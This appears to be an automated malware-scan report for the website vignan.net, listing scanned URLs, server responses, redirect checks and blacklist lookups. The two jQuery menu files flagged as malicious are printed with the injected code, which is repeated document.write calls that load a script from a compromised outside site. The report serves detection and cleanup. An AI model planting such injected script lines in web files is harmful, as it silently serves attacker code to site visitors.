Scanned pages/files
Request | Server response | Status |
http://www.vignan.net/ | 200 OK Content-Length: 3767 Content-Type: text/html | clean |
http://www.vignan.net/menufiles/jquery.min.js | 200 OK Content-Length: 58536 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(mat document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); Antivirus reports:
| ||
http://www.vignan.net/menufiles/jqueryslidemenu.js | 200 OK Content-Length: 5204 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var arrowimages={down:['downarrowclass', 'down.gif', 23], right:['rightarrowclass', 'right.gif']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#"+menuid+">ul") var $headers=$mainmenu.find("ul").parent() $headers.each(function(i){ var $curobj=$(this) var $subul=$(this).find('ul:eq(0)') this._dimen document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); document.write('<script src=http://outiltech-orleans.qc.ca/images/promotions.php ><\/script>'); Antivirus reports:
| ||
http://outiltech-orleans.qc.ca/images/promotions.php | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 04 Oct 2014 08:02:32 GMT Pragma: no-cache Location: http://www.outiltech-orleans.qc.ca/images/promotions.php Server: Webserver Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: X-Pingback: http://www.outiltech-orleans.qc.ca/xmlrpc.php X-Powered-By: PHP/5.2.17 X-Powered-By: PleskLin | clean |
http://www.outiltech-orleans.qc.ca/images/promotions.php | 404 Not Found Content-Length: 8846 Content-Type: text/html | clean |
http://www.outiltech-orleans.qc.ca/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/simple-lightbox/js/lib.js?ver=1.6.3.1 | 200 OK Content-Length: 29386 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/vslider/js/vslider.js?ver=3.5 | 200 OK Content-Length: 15382 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.23 | 200 OK Content-Length: 15159 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.2 | 200 OK Content-Length: 6859 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/themes/outiltech/js/small-menu.js?ver=20120206 | 200 OK Content-Length: 1254 Content-Type: application/x-javascript | clean |
http://outiltech-orleans.qc.ca/images/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 04 Oct 2014 08:02:38 GMT Pragma: no-cache Location: http://www.outiltech-orleans.qc.ca/images/ Server: Webserver Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: X-Pingback: http://www.outiltech-orleans.qc.ca/xmlrpc.php X-Powered-By: PHP/5.2.17 X-Powered-By: PleskLin | clean |
http://www.outiltech-orleans.qc.ca/images/ | 404 Not Found Content-Length: 8846 Content-Type: text/html | clean |
http://www.outiltech-orleans.qc.ca/ | 200 OK Content-Length: 15766 Content-Type: text/html | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-fr.js?ver=2.1.9 | 200 OK Content-Length: 7317 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.1.9 | 200 OK Content-Length: 47091 Content-Type: application/x-javascript | clean |
http://www.outiltech-orleans.qc.ca/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.1.9 | 200 OK Content-Length: 2526 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vignan.net
Result:
GET / HTTP/1.1
Host: vignan.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vignan.net
Referer: http://www.google.com/search?q=vignan.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vignan.net
Referer: http://www.google.com/search?q=vignan.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vignan.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vignan.net/
Result: vignan.net is not infected or malware details are not published yet.
Result: vignan.net is not infected or malware details are not published yet.